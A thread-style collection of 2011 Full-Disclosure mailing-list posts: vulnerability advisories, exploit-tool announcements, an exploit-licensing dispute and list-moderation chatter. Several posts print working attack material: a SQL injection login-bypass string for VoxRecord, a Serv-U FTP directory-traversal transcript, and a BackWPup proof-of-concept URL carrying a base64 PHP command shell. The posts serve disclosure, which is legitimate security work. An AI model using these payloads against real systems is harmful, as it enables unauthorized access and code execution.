[Full-disclosure] mazur.harvard.edu database leak
Noticed this getting passed around twitter and decided to share in case you guys haven't seen it. http://blog.hacktalk.net/mazur-harvard-edu-database-leak/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg Download it directly from the main site: http://www.exploitpack.com We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass
=== VoxRecord Control Centre - version 2.7 Blind SQLi and auth. bypass === Affected Software : Voxsmart - VoxRecord Control Centre v. 2.7 Severity : Critical Local/Remote : Remote Author: Piotr Duszynski @drk1wi [Summary] A blind sqli exists in /vcc/login.php login page. This can be used either for authentication bypass (admin privileges gained) or login:pass extraction from the 'voxsuser' database table. [Vulnerability Details] HTTP POST :/vcc/login.php admin_un=adm[ BLIBD SQL INJECTION]admin_pw=adddm - Authentication bypass: set admin_un to admin'%20or%201%3d1-- - Blind SQLi data extraction: 'voxsuser' table columns +-+++---+++ | email | id | is_loged | password | user_type | username | +-+++---+++ [Time-line] 1/10/2011 - Vendor notified ???- Vendor response ???- Vendor patch release 30/11/2011 - Public disclosure Cheers, @drk1wi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Serv-U Remote
I m better than TESO! CONFIDENTIAL SOURCE MATERIALS! [*][*] Serv-U FTP Server Jail Break 0day Discovered By Kingcope Year 2011 [*][*] Affected: 220 Serv-U FTP Server v7.3 ready... 220 Serv-U FTP Server v7.1 ready... 220 Serv-U FTP Server v6.4 ready... 220 Serv-U FTP Server v8.2 ready... 220 Serv-U FTP Server v10.5 ready... [*][*] C:\Users\kingcope\Desktopftp 192.168.133.134 Verbindung mit 192.168.133.134 wurde hergestellt. 220 Serv-U FTP Server v6.4 for WinSock ready... Benutzer (192.168.133.134:(none)): ftp (anonymous user :) 331 User name okay, please send complete E-mail address as password. Kennwort: 230 User logged in, proceed. ftp cd /..:/..:/..:/..:/program files 250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files ftp ls -la 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. dr--r--r-- 1 user group 0 Nov 12 21:48 . dr--r--r-- 1 user group 0 Nov 12 21:48 .. drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio n drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources d- 1 user group 0 Jul 8 16:12 InstallShield Installation Information drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch drw-rw-rw- 1 user group 0 Feb 12 2011 Java drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com drw-rw-rw- 1 user group 0 Feb 12 2011 Sun d- 1 user group 0 Jul 29 15:13 Uninstall Information drw-rw-rw- 1 user group 0 Feb 5 2011 VMware drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT d- 1 user group 0 Feb 5 2011 WindowsUpdate 226 Transfer complete. FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s ftp [*][*] with write perms: ftp put foo.txt ..:/..:/..:/foobar -- writes foo into root of partition [*][*] and as anonymous ftp: ftp get ..:/..:/..:/..:/windows/system32/calc.exe yes 200 PORT Command successful. 150 Opening ASCII mode data connection for calc.exe (115712 Bytes). 226 Transfer complete. FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s [*][*] This works to!!! : 220 Serv-U FTP Server v7.3 ready... Benutzer (xx.xx.xx.xx:(none)): ftp 331 User name okay, please send complete E-mail address as password. Kennwort: 230 User logged in, proceed. ftp ls -a ..:\:..\..:\..:\..:\..:\..:\..:\..:\* 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. . .. AUTOEXEC.BAT boot.ini bootfont.bin bsmain_runtime.log CONFIG.SYS Documents and Settings FPSE_search Inetpub IO.SYS log MSDOS.SYS msizap.exe MSOCache mysql NTDETECT.COM ntldr Program Files RavBin RECYCLER Replay.log rising.ini System Volume Information TDDOWNLOAD WCH.CN WINDOWS wmpub 226 Transfer complete. 317 bytes transferred. 19.35 KB/sec. FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s [*][*] Sometimes you need to give it the path: ftp ls -a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\ ftp ls -a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\* 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. . .. 360 Adobe ASP.NET CCProxy CE Remote Tools cmak Common Files ComPlus Applications D-Tools FFTPServer HTML Help Workshop IISServer InstallShield Installation Information Intel Internet Explorer Java JavaSoft K-Lite Codec Pack Microsoft ActiveSync Microsoft Analysis Services Microsoft Device Emulator Microsoft MapPoint Web Service Samples Microsoft MapPoint Web Service SDK, Version 4.0 Microsoft Office Microsoft Office Servers Microsoft Silverlight Microsoft SQL Server Microsoft Visual SourceSafe Microsoft Visual Studio 8 Microsoft.NET MSBuild MSXML 6.0 NetMeeting Outlook Express PortMap1.61 Reference Assemblies Rising SQLXML 4.0 SQLyog Enterprise STS2Setup_2052 Symantec Thunder Network TSingVision Uninstall Information Windows Media Player
[Full-disclosure] Writing Self Modifying Code
Hello full disclosureites, a new tutorial is available at InfoSec Institute review from Andrew King on writing self modifying code. This is part one of a three part series: http://resources.infosecinstitute.com/writing-self-modifying-code-part-1/ In subsequent parts, Andrew will demonstrate how this can be used to bypass antivirus and other neat tricks. Your thoughts? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
Hello there! The exploit roaringbeast will be added to Exploit pack Authors name and code/license will be respected and it will be ported to Python with minimal modifications The code will be uploaded to Exploit Pack Git Repo and will be available to all our users Thank you and congratulations for such a great job! JSacco On 30.11.2011 13:32, HI-TECH . wrote: /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit * * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS * * This is unpublished proprietary source code of KINGCOPE Security. * * (C) COPYRIGHT KINGCOPE Security, 2011 * All Rights Reserved * * * bug found by Kingcope * thanks to noone except alex whose damn down * * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386; *FreeBSD-6.3 i386 *FreeBSD-5.5,5.2 i386 *FreeBSD-8.2 amd64 *FreeBSD-7.3, 7.0 amd64 *FreeBSD-6.4, 6.2 amd64 * */ I m better than TESO 7350 see attached. I aint mad at cha and dont forget that the scene is fucked. and that the public scene is fucked too, kind of. youse a down ass bitch and I aint mad at cha. thanks lsd you are the only one NORMAL. hear the track before you see the code: http://www.youtube.com/watch?v=krxu9_dRUwQ BTW my box (isowarez.de) got hacked so expect me in a zine : /Signed the awesome Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2355-1] clearsilver security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2355-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff November 30, 2011 http://www.debian.org/security/faq - - Package: clearsilver Vulnerability : format string vulnerability Problem type : remote Debian-specific: no CVE ID : CVE-2011-4357 Leo Iannacone and Colin Watson discovered a format string vulnerability in the Python bindings for the Clearsilver HTML template system, which may lead to denial of service or the execution of arbitrary code. For the oldstable distribution (lenny), this problem has been fixed in version 0.10.4-1.3+lenny1. For the stable distribution (squeeze), this problem has been fixed in version 0.10.5-1+squeeze1. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your clearsilver packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk7Wn9QACgkQXm3vHE4uyloaDgCfc++RS4cmU/+vrEhoRtVoLzQU YgcAoJV5jRA7BZOCKHUUtcf34as7jssR =Am2z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
Hi lists, sorry if I offended anyone with by referring to teso, I really like teso as you might also. all this happend because I was drunk hehe : I hope you enjoy this release! Am 30. November 2011 20:32 schrieb HI-TECH . isowarez.isowarez.isowa...@googlemail.com: /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit * * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS * * This is unpublished proprietary source code of KINGCOPE Security. * * (C) COPYRIGHT KINGCOPE Security, 2011 * All Rights Reserved * * * bug found by Kingcope * thanks to noone except alex whose damn down * * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386; * FreeBSD-6.3 i386 * FreeBSD-5.5,5.2 i386 * FreeBSD-8.2 amd64 * FreeBSD-7.3, 7.0 amd64 * FreeBSD-6.4, 6.2 amd64 * */ I m better than TESO 7350 see attached. I aint mad at cha and dont forget that the scene is fucked. and that the public scene is fucked too, kind of. youse a down ass bitch and I aint mad at cha. thanks lsd you are the only one NORMAL. hear the track before you see the code: http://www.youtube.com/watch?v=krxu9_dRUwQ BTW my box (isowarez.de) got hacked so expect me in a zine : /Signed the awesome Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Writing Self Modifying Code
groundbreaking! On Wed, Nov 30, 2011 at 11:30 PM, Adam Behnke a...@infosecinstitute.com wrote: Hello full disclosureites, a new tutorial is available at InfoSec Institute review from Andrew King on writing self modifying code. This is part one of a three part series: http://resources.infosecinstitute.com/writing-self-modifying-code-part-1/ In subsequent parts, Andrew will demonstrate how this can be used to bypass antivirus and other neat tricks. Your thoughts? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
If you want to respect the license of this code you cannot include the exploit in your software. All rights reserved means you cannot include it in other products, actually nobody can except the author. You should ask the author for permission to redistribute the exploit or re-implement it. On 11/30/2011 06:11 PM, nore...@exploitpack.com wrote: Hello there! The exploit roaringbeast will be added to Exploit pack Authors name and code/license will be respected and it will be ported to Python with minimal modifications The code will be uploaded to Exploit Pack Git Repo and will be available to all our users Thank you and congratulations for such a great job! JSacco On 30.11.2011 13:32, HI-TECH . wrote: /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit * * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS * * This is unpublished proprietary source code of KINGCOPE Security. * * (C) COPYRIGHT KINGCOPE Security, 2011 * All Rights Reserved * * * bug found by Kingcope * thanks to noone except alex whose damn down * * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386; * FreeBSD-6.3 i386 * FreeBSD-5.5,5.2 i386 * FreeBSD-8.2 amd64 * FreeBSD-7.3, 7.0 amd64 * FreeBSD-6.4, 6.2 amd64 * */ I m better than TESO 7350 see attached. I aint mad at cha and dont forget that the scene is fucked. and that the public scene is fucked too, kind of. youse a down ass bitch and I aint mad at cha. thanks lsd you are the only one NORMAL. hear the track before you see the code: http://www.youtube.com/watch?v=krxu9_dRUwQ BTW my box (isowarez.de) got hacked so expect me in a zine : /Signed the awesome Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSSer v1.6 -beta- aka Grey Swarm! released.
Hi list, There is released a new version of *XSSer* (v1.6-beta-) - the cross site scripter framework. Take a look to the XSSer website to see new features implemented, screenshots, documentation, etc... http://xsser.sf.net You can download original code directly from here: http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download Or update your copy from the XSSer svn repository: $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser Also, you have on the main website some pre-compiled packages (ArchLinux, Debian/Ubuntu, Gentoo, etc..) Are you ready for the Grey Swarm!? Happy cross hacking. psy. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability - SOS-11-003
On Mon, Mar 28, 2011 at 03:10:39PM +1100, Lists wrote: Sense of Security - Security Advisory - SOS-11-003 Release Date. 28-Mar-2011 Last Update. - Vendor Notification Date. 25-Mar-2010 Product. Wordpress Plugin BackWPup Platform. Independent Affected versions. 1.6.1 (verified), possibly others Severity Rating. High Impact.System Access Attack Vector. Remote without authentication Solution Status. Upgrade to version 1.7.1 CVE reference. Not yet assigned Details. A vulnerability has been discovered in the Wordpress plugin BackWPup 1.6.1 which can be exploited to execute local or remote code on the web server. The Input passed to the component wp_xml_export.php via the wpabs variable allows the inclusion and execution of local or remote PHP files as long as a _nonce value is known. The _nonce value relies on a static constant which is not defined in the script meaning that it defaults to the value 822728c8d9. Proof of Concept. wp_xml_export.php?_nonce=822728c8d9wpabs=data://text/plain;base64,PGZ vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0 ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d Solution. Upgrade to version 1.7.1 Discovered by. Phil Taylor - Sense of Security Labs. Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA T: +61 (0)2 9290 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: i...@senseofsecurity.com.au Twitter: @ITsecurityAU The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php http://osvdb.org/show/osvdb/71481 CVE-2011-4342 - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Is FD no longer unmoderated?
A colleague of mine subscribed to FD recently and tried posting to it but every time he gets this message: Is being held until the list moderator can review it for approval. The reason it is being held: Post to moderated list Either the message will get posted to the list, or you will receive notification of the moderator's decision. But the message neither gets posted, nor does he ever gets the moderator's decision in a notification? What's the matter? Since when is this list moderated? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is FD no longer unmoderated?
On Thu, 01 Dec 2011 07:49:28 +0530, David Blanc said: A colleague of mine subscribed to FD recently and tried posting to it but every time he gets this message: n3td3v, is that your sock puppet? :) The *list* isn't moderated. However, several *people* are, and they for the most part know who they are and why they're moderated. (And no, I'm not one of the list moderators, nor do I have any real influence with those that are) pgpsKYkBPniIc.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Seems to have Juan Succo written all over it On 11/30/11 1:49 AM, Mario Vilas wrote: Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com mailto:nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg Download it directly from the main site: http://www.exploitpack.com We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is FD no longer unmoderated?
Hi, Am 01. Dezember schrieb David Blanc: A colleague of mine subscribed to FD recently and tried posting to it but every time he gets this message: Is he using a different mail adress than that one he used to subscribe to FD? Cheers, Stefan -- make -it ./work GnuPG-Key: B96CF8D2 s...@tanis.toppoint.de Fingerprint: D8AC D5E7 6865 19B1 385F 8850 2AB7 6A82 B96C F8D2 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/